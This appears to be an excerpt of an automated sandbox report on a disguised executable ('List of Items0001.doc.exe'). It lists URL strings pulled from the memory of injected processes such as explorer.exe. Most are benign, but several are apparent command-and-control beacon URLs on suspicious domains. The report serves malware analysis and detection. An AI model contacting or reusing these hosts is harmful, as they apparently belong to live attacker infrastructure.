        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.3
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28903/search.png)
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/29590/bg1.png)
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000005166000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.00000000038F6000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015E26000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://inf30027group23.xyz/ekqf/?7LY=/kxxO9I2Zn9CFnKuVCiRmYl7loL48a9gy2ZogM6oKxXZExQsRNG6tTBrzETHf9D
        Source: List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: List of Items0001.doc.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 00000009.00000002.678915551675.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.0000000010436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuN
        Source: firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677551987614.00000000091CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C3A1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.000000001050C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678915551675.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678915551675.000000001050C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C3A1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C8A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678895082217.00000000091CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C8A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: explorer.exe, 00000009.00000000.677553291897.0000000009580000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.678885890827.0000000002B90000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677554073945.000000000A8D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Brainchainllc.online
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.brainchainllc.online/Buy_Makeup_Online.cfm?fp=w9FZG3e%2FPBub3ueojWcHgi4hSNkP9mT0Fk1ZvsVQB
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.brainchainllc.online/Free_Giveaways.cfm?fp=w9FZG3e%2FPBub3ueojWcHgi4hSNkP9mT0Fk1ZvsVQBFu0
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.brainchainllc.online/Free_Makeup_Samples.cfm?fp=w9FZG3e%2FPBub3ueojWcHgi4hSNkP9mT0Fk1ZvsV
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.brainchainllc.online/Free_Samples_by_Mail.cfm?fp=w9FZG3e%2FPBub3ueojWcHgi4hSNkP9mT0Fk1Zvs
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.brainchainllc.online/Free_Soap_Coupons.cfm?fp=w9FZG3e%2FPBub3ueojWcHgi4hSNkP9mT0Fk1ZvsVQB
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.brainchainllc.online/__media__/design/underconstructionnotice.php?d=brainchainllc.online
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.brainchainllc.online/__media__/js/trademark.php?d=brainchainllc.online&type=ns
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.brainchainllc.online/px.js?ch=1
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.brainchainllc.online/px.js?ch=2
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.brainchainllc.online/sk-logabpstatus.php?a=dllsNHYvUDhjZEJYL2NwTFExWE1WdXllTFA1bTJkaDRkRE
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.000000000561C000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000003DAC000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.00000000162DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chalet-tofane.net:80/ytc6/?Nze=C0klVT&amp;7LY=RYHehDtD4gH3OO31IF1CMhco/TkeBNw6MFMBy
        Source: List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: MzAJhEkohQv.exe, 00000006.00000002.678884095238.0000000000694000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.new-wellness.net
        Source: MzAJhEkohQv.exe, 00000006.00000002.678884095238.0000000000694000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.new-wellness.net/tohg/
        Source: List of Items0001.doc.exe, 00000003.00000001.673959496421.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: List of Items0001.doc.exe, 00000003.00000001.673959496421.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.00000000047FA000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002F8A000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.00000000154BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://6329.vhjhbv.com/s4uc/?7LY=Ild9uTse2YuJI5ySpNHelXsDHBMTyrynZItWdBZgXlNghndwR
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: explorer.exe, 00000009.00000000.677560796859.000000000C352000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C352000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
        Source: explorer.exe, 00000009.00000000.677560796859.000000000C352000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C352000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEM
        Source: explorer.exe, 00000009.00000000.677563487006.000000000C94C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 00000009.00000002.678894303006.0000000008F2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677551387374.0000000008F2D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.co
        Source: explorer.exe, 00000009.00000002.678894303006.0000000008F2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677551387374.0000000008F2D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.coFo
        Source: explorer.exe, 00000009.00000000.677551987614.00000000090FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678895082217.00000000090FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/X6
        Source: explorer.exe, 00000009.00000000.677551987614.00000000090FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678895082217.00000000090FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/l6
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sp:
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blend%
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-l
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=02bd
        Source: explorer.exe, 00000009.00000000.677560796859.000000000C7F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C7F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=3e4b6c3b-d87a-8603-8e90-e93f0f328660&user=m
        Source: explorer.exe, 00000009.00000002.678894303006.0000000008F2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677551387374.0000000008F2D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=50939367-7e05-543f-3a79-7d4c998285e9&user=m
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=c5203b
        Source: explorer.exe, 00000009.00000002.678895082217.00000000091CF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 00000009.00000000.677551987614.00000000091CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678895082217.00000000091CF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?~
        Source: explorer.exe, 00000009.00000002.678908041013.000000000C2AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C2AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 00000009.00000000.677551987614.00000000091CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678895082217.00000000091CF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.
        Source: explorer.exe, 00000009.00000000.677560796859.000000000C2DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/
        Source: explorer.exe, 00000009.00000000.677560796859.000000000C7F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C7F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weather
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1
        Source: explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/
        Source: explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/
        Source: explorer.exe, 00000009.00000000.677563487006.000000000C9FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svg
        Source: explorer.exe, 00000009.00000000.677551387374.0000000008F20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbaryV
        Source: explorer.exe, 00000009.00000002.678908041013.000000000C3A1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678915551675.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C3A1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/news/BreakingNews_72x72.svg
        Source: explorer.exe, 00000009.00000002.678908041013.000000000C3A1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C3A1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/news/BreakingNews_72x72.svgz
        Source: explorer.exe, 00000009.00000002.678915551675.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C506000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C506000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/AQI/uspl04.svg
        Source: explorer.exe, 00000009.00000002.678915551675.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.0000000010436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/AQI/uspl04.svgm
        Source: explorer.exe, 00000009.00000002.678908041013.000000000C3A1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C7CA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C7CA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C3A1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition_Badge/MostlyClearNig
        Source: firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap-icons
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css
        Source: TapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.4.1.min.js
        Source: firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
        Source: explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
        Source: TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
